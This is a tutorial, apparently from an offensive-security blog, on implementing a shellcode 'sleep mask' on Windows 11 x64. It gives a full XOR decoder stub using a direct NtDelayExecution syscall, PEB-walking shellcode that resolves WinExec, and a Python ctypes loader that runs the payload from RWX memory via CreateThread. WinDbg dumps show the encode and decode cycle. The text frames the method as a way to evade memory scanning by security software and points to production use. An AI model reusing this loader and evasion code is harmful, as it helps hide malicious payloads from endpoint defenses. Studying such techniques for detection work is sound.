Sleep Masks

Modern security software scans memory. This is often done when certain functions, such as CreateThread, are called, but it can also occur periodically. One method of evading this type of scanning is to implement a sleep mask. A sleep mask keeps our shellcode encoded in memory and only decodes it while it is executing. The examples provided are for Windows 11 running on x64.

Sleeping with Syscalls

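The NtDelayExecution syscall (0x34) can be used to delay execution. The syscall takes the delay as its parameter: a negative (i.e. relative) interval expressed in 100-nanosecond units. The value used below, 0xfffffffffa0a1f00, is -100,000,000, which corresponds to 10 seconds.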

    "sleep: "                           # A sleep syscall
    " sub rsp, 8;"                      # Allocate space on the stack for our pointer
    " mov rcx, 0xfffffffffa0a1f00; "    # QWORD: negative time in nanoseconds
    " mov [rsp], rcx;"                  # Copy the value to the stack
    " lea rdx, [rsp];"                  # Get a pointer to the stack value
    " mov rax, 0x34; "                  # Syscall for NtDelayExecution
    " syscall; "                        # Call NtDelayExecution
    " add rsp, 8;"                      # Reset our stack pointer

System calls have a different calling convention to regular x64 function calls. The only parameter we need to supply is a pointer to the time offset in the RDX register.

| System Call Number | ARG0 | ARG1 | ARG2 | ARG3 |
|--------------------|------|------|------|------|
| RAX                | R10  | RDX  | R8   | R9   |

Implementing an XOR sleep mask

The decoder stub below will decode any instructions that follow the 160-byte decoder stub, using an XOR operation with a key of 0x12.

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

def encode_payload(payload_array):
    """Return a copy of *payload_array* with every byte XORed with 0x12.

    The input is first converted with ``bytearray(...)``, so anything that
    constructor accepts (bytes, bytearray, iterable of ints in 0..255) works.
    The encoded result is printed and then returned as a ``bytearray``.
    XOR is its own inverse, so applying this function twice yields the
    original bytes.
    """
    encoded = bytearray(value ^ 0x12 for value in bytearray(payload_array))
    print(encoded)
    return encoded

def main():
    """Assemble the decoder stub, append the XOR-encoded payload and run it.

    Steps, in order:
      1. Assemble ``SHELLCODE`` with Keystone (x86, 64-bit mode) into
         ``decoder_stub`` and a printable ``\\xNN`` string.
      2. XOR-encode ``calc_shellcode`` with ``encode_payload`` and append the
         result to the stub.
      3. Start WinDbgX against the current process and block on ``input()``.
      4. Allocate memory with VirtualAlloc, copy the combined buffer into it,
         start a thread at that address and wait on the thread handle.

    Windows-only: the function relies on ``ctypes.windll``.
    """
    # The assembly is built from adjacent string literals; the trailing
    # Python comments describe each instruction.
    SHELLCODE = (
    "start: "
    "int3;"
    " mov rax, rip; "                   # Get a reference to our shellcode location
    " add rax, 160; "                   # This should be 160 bytes after this stub
    " mov [rsp+100], rax;"              # Store a pointer to this on the stack + 0x64

    "sleep: "                           # A sleep syscall
    " sub rsp, 8;"                      # Allocate space on the stack for our pointer
    " mov rcx, 0xfffffffffa0a1f00; "    # QWORD: negative (relative) delay in 100-ns units (-100,000,000 = 10 s)
    " mov [rsp], rcx;"                  # Copy the value to the stack
    " lea rdx, [rsp];"                  # Get a pointer to the stack value
    " mov rax, 0x34; "                  # Syscall for NtDelayExecution
    " syscall; "                        # Call NtDelayExecution
    " add rsp, 8;"                      # Reset our stack pointer

    " mov rax, [rsp+100];"              # Get our heap pointer back
    " mov r13, rax; "                   # R13 = start of string
    " mov rdi, rax; "                   # RDI = start of string. Will act as counter.
    " xor rcx, rcx; "                   # Clear RCX to use it as a counter for string length

    "calculate_length: "                # Calculate the length of the string (in bytes)
    " xor rax,rax;"                     # Zero RAX to use as comparison for our NULL byte
    " cmp [rdi], rax; "                 # Check if the current byte is null (end of string)
    " je  end_calculation;"             # If yes, jump to the end of the calculation
    " inc rdi;"                         # Move to the next byte
    " inc rcx;"                         # Increment the counter
    " jmp calculate_length;"            # Repeat the process

    "end_calculation: " 
    " mov rdi, r13; "                   #  RDI = start of encoded string
    " mov rsi, r13; "                   #  RSI points to the beginning of the allocated memory for the decoded string
    " mov rdx, rcx; "                   #  Copy string length to RDX

    "decode_loop: "
    " cmp rdx, 0;"                      # Check if we have reached the end of the string
    " je  execute_decoded; "            # If yes, jump to execute_decoded
    " mov al, [rdi];"                   # Load the current byte from the encoded string into al
    " xor al, 0x12;"                    # XOR the byte with the key (0x12)
    " mov [rdi], al;"                   # Store the result in the decoded string
    " inc rdi;"                         # Move to the next byte in the string
    " inc rsi;"                         # Move to the next byte in the decoded string
    " dec rdx;"                         # Decrement the counter
    " jmp decode_loop;"                 # Repeat the process

    "execute_decoded: "
    "nop;"
    " add rsp, 256;"                    # Make some room on the stack    
    " pop r14;"                         # retrieve the stack contents
    " xor r14, 1;"                      # XOR R14 with 1 - R14 is incorrect at this point
    " push r14;"                        # Save a value on the stack to say we are decrypted
    " sub rsp, 256;"                    # Pivot the stack back

    " cmp r14, 0;"                      # If value = 1 we just decrypted.
    " je  sleep; "                      # If 0, start again without executing.
    " sub rsi, rcx; "                   # Subtract the string length from the decoded string to find where we landed
    " sub rsp, 8;"                      # Make some room on the stack
    " mov r15, rsp;"                    # Save our stack pointer
    " call rsi; "                       # Jump to our decoded shellcode
    " nop;"
    " add rsp, 8;"
    " jmp sleep;"                       # Begin the loop again

    )

    # Assemble the stub; ks.asm returns the encoded bytes as a list of ints
    # plus the number of statements assembled.
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)
    decoder_stub = b""
    output = ""
    for opcode in instructions:
        decoder_stub += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode

    # Presumably printed so it can be compared with the hard-coded offset of
    # 160 used in the stub ("add rax, 160") - TODO confirm.
    print("Encoder length: " + str(len(decoder_stub)))

    # Payload bytes: eight NOPs followed by the pre-assembled payload.
    calc_shellcode =  b"\x90\x90\x90\x90\x90\x90\x90\x90" # Some NOPS for padding
    calc_shellcode += b"\x48\x81\xec\x08\x02\x00\x00\x49\x83\xf6\x0e\x4d\x31\xed\x49\x83\xf4\x0c\x4d\x31\xdb\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\xad\x48\x96\x48\xad\x48\x8b\x58\x20\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x4d\x31\xe4\x49\x81\xc4\xff\xff\x8f\x08\x49\xc1\xec\x14\x42\x8b\x14\x23\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x67\xe3\x20\x31\xdb\x41\x8b\x5c\x8b\x04\x4c\x01\xc3\x48\xff\xc9\x48\xb8\xff\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xe8\x08\x48\x39\x03\x75\xdd\x4d\x31\xdb\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x44\xab\x04\x4c\x01\xc0\x49\x89\xc6\x48\x31\xc0\x50\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x20\x41\xff\xd6\x48\x81\xc4\x08\x02\x00\x00\x48\x83\xc4\x30\xc3"

    # NOTE: this prints the length of the payload before it is encoded.
    print("Encoded shellcode length: " + str(len(calc_shellcode)))

    encoded_payload = encode_payload(calc_shellcode) # Encode our payload

    # Final buffer layout: [decoder stub][XOR-encoded payload].
    shellcode = bytearray(decoder_stub)
    shellcode += encoded_payload

    # Only the decoder stub is printed here; `output` does not include the payload.
    print("Shellcode: " + output )
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    # VirtualAlloc returns a pointer, so its restype is widened to c_void_p.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    # NOTE(review): argtypes are set on RtlCopyMemory, but the copy below is
    # performed with RtlMoveMemory.
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t )
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) )
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    # A timeout of -1 waits on the thread handle indefinitely.
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);

# Run the demo only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

Shellcode Generation

The shellcode we execute within the loop will need to cleanly return. The below code from our previous article can be used for this purpose. This just executes a system command (in this case calc.exe) and returns.

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

def main():
    """Assemble the payload shown in SHELLCODE and run it in a new thread.

    Steps, in order:
      1. Assemble ``SHELLCODE`` with Keystone (x86, 64-bit mode) into ``sh``
         and a printable ``\\xNN`` string.
      2. Print the printable form and the byte count.
      3. Start WinDbgX against the current process and block on ``input()``.
      4. Allocate memory with VirtualAlloc, copy the bytes into it, start a
         thread at that address and wait on the thread handle.

    Windows-only: the function relies on ``ctypes.windll``.
    """
    # The assembly is built from adjacent string literals; the trailing
    # Python comments describe each instruction. Lines that are commented out
    # are the original variants kept for reference.
    SHELLCODE = (
        " start: "
        #" int3;"
        "  sub rsp, 0x208;"                 # Make some room on the stack (NULL BYTE)
        #"  sub rsp, 0x100;"                # Avoid Null Byte
        "  xor r14,14;"
        "  xor r13,r13; "
        "  xor r12,12;"
        "  xor r11,r11; "
        " locate_kernel32:"
        "   xor rcx, rcx;"                  # Zero RCX contents
        "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
        "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
        "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
        "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
        "   xchg rax, rsi;"                 # Swap RAX,RSI
        "   lodsq;"                         # Load qword at address (R)SI into RAX
        "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
        "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register
 
       # Code for parsing Export Address Table
        "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
        "   add rbx, r8; "                  # Add dereferenced signature offset to kernel32 base. Store in RBX.
       # "   mov edx, [rbx+0x88];"          # Offset from PE32 Signature to Export Address Table (NULL BYTE)
        "   xor r12,r12;"
        "   add r12, 0x88FFFFF;"
        "   shr r12, 0x14;"
        "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
         
        "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
        "   mov r10d, [rdx+0x14];"          # Number of functions
        "   xor r11, r11;"                  # Zero R11 before use
        "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
        "   add r11, r8;"                   # AddressOfNames VMA
 
        # Loop over Export Address Table to find WinExec name
        "   mov rcx, r10;"                  # Set loop counter
        "kernel32findfunction: "
        " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
        "   xor ebx,ebx;"                   # Zero EBX for use
        "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
        "   add rbx, r8;"                   # RBX = Function name VMA
        "   dec rcx;"                       # Decrement our loop by one
      # "   mov rax, 0x00636578456E6957;"   # WinExec (NULL BYTE)      
        "   mov rax, 0x636578456E6957FF;"   # WinExec
        "   shr rax, 0x8;"
        "   cmp [rbx], rax;"                # Check if we found WinExec
        "   jnz kernel32findfunction;"
 
        "FunctionNameFound: "
        # We found our target
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
        "   add r11, r8;"                   # AddressOfNameOrdinals VMA
        # Get the function ordinal from AddressOfNameOrdinals
        "   inc rcx;"
        "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
        # Get function address from AddressOfFunctions
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
        "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
        "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
        "   add rax, r8;"                   # Add base address to function RVA
        "   mov r14, rax;"
 
       # WinExec Call
        "  xor rax, rax;"                   # Zero RAX to become a null byte
        "  push rax;"                       # Push the null byte to the stack
        "  mov rax, 0x6578652E636C6163;"    # Add calc.exe string to RAX.
        "  push rax;"                       # Push RAX to stack
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec
        "  add rsp, 0x208;"
        "  add rsp, 0x30;"
        "  ret;"
 
    )
 
    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)
 
    # Build both the raw bytes and a printable "\xNN" rendering of them.
    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode
 
 
    shellcode = bytearray(sh)

    print("Shellcode: "  + output )
    print("Bytes: " + str(len(sh)))
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");
 
    # VirtualAlloc returns a pointer, so its restype is widened to c_void_p.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    # NOTE(review): argtypes are set on RtlCopyMemory, but the copy below is
    # performed with RtlMoveMemory.
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 
 
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    # A timeout of -1 waits on the thread handle indefinitely.
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);
 
# Run the demo only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

Running the Code

By adding software breakpoints (int3) to the code, we can see that on initial execution our payload is encoded in memory:

0:008> dq rax
000001e1`2b1800a0  82828282`82828282 5b121210`1afe935a
000001e1`2b1800b0  915bff23`5f1ce491 db235ac9`235f1ee6
000001e1`2b1800c0  52995a72`53995a77 5abf5a32`62995a0a
000001e1`2b1800d0  5b324a99`5abf5a84 d1135e2e`4999ca9b
000001e1`2b1800e0  ededd693`5bf6235f 995006fe`d35b1a9d
000001e1`2b1800f0  409956d0`135e3106 32489956`c9235f06
000001e1`2b180100  f175c39b`5ed1135f 16994e99`53c92332
000001e1`2b180110  aa5adbed`5ad1135e 71776a57`7c7b45ed

After sleeping for 10 seconds, our code is decoded and executed:

0:008> dq rax
000001e1`2b1800a0  90909090`90909090 49000002`08ec8148
000001e1`2b1800b0  8349ed31`4d0ef683 c93148db`314d0cf4
000001e1`2b1800c0  408b4860`418b4865 48ad4820`708b4818
000001e1`2b1800d0  4920588b`48ad4896 c3014c3c`5b8bd889
000001e1`2b1800e0  ffffc481`49e4314d 8b4214ec`c149088f
000001e1`2b1800f0  528b44c2`014c2314 205a8b44`db314d14
000001e1`2b180100  e367d189`4cc3014d 048b5c8b`41db3120
000001e1`2b180110  b848c9ff`48c3014c 63657845`6e6957ff
0:008> u rax L20
000001e1`2b1800a0 90              nop
000001e1`2b1800a1 90              nop
000001e1`2b1800a2 90              nop
000001e1`2b1800a3 90              nop
000001e1`2b1800a4 90              nop
000001e1`2b1800a5 90              nop
000001e1`2b1800a6 90              nop
000001e1`2b1800a7 90              nop
000001e1`2b1800a8 4881ec08020000  sub     rsp,208h
000001e1`2b1800af 4983f60e        xor     r14,0Eh
000001e1`2b1800b3 4d31ed          xor     r13,r13
000001e1`2b1800b6 4983f40c        xor     r12,0Ch
000001e1`2b1800ba 4d31db          xor     r11,r11
000001e1`2b1800bd 4831c9          xor     rcx,rcx
000001e1`2b1800c0 65488b4160      mov     rax,qword ptr gs:[rcx+60h]
000001e1`2b1800c5 488b4018        mov     rax,qword ptr [rax+18h]
000001e1`2b1800c9 488b7020        mov     rsi,qword ptr [rax+20h]
000001e1`2b1800cd 48ad            lods    qword ptr [rsi]
000001e1`2b1800cf 4896            xchg    rax,rsi
000001e1`2b1800d1 48ad            lods    qword ptr [rsi]
000001e1`2b1800d3 488b5820        mov     rbx,qword ptr [rax+20h]
000001e1`2b1800d7 4989d8          mov     r8,rbx
000001e1`2b1800da 8b5b3c          mov     ebx,dword ptr [rbx+3Ch]

Once executed, the code is encoded again. This process occurs every 10 seconds on the host machine.

0:008> dq rax
000001e1`2b1800a0  82828282`82828282 5b121210`1afe935a
000001e1`2b1800b0  915bff23`5f1ce491 db235ac9`235f1ee6
000001e1`2b1800c0  52995a72`53995a77 5abf5a32`62995a0a
000001e1`2b1800d0  5b324a99`5abf5a84 d1135e2e`4999ca9b
000001e1`2b1800e0  ededd693`5bf6235f 995006fe`d35b1a9d
000001e1`2b1800f0  409956d0`135e3106 32489956`c9235f06
000001e1`2b180100  f175c39b`5ed1135f 16994e99`53c92332
000001e1`2b180110  aa5adbed`5ad1135e 71776a57`7c7b45ed

In Conclusion

This article provides a basic sleep mask. Implementing a more elaborate encoding scheme would be recommended when using this technique in production.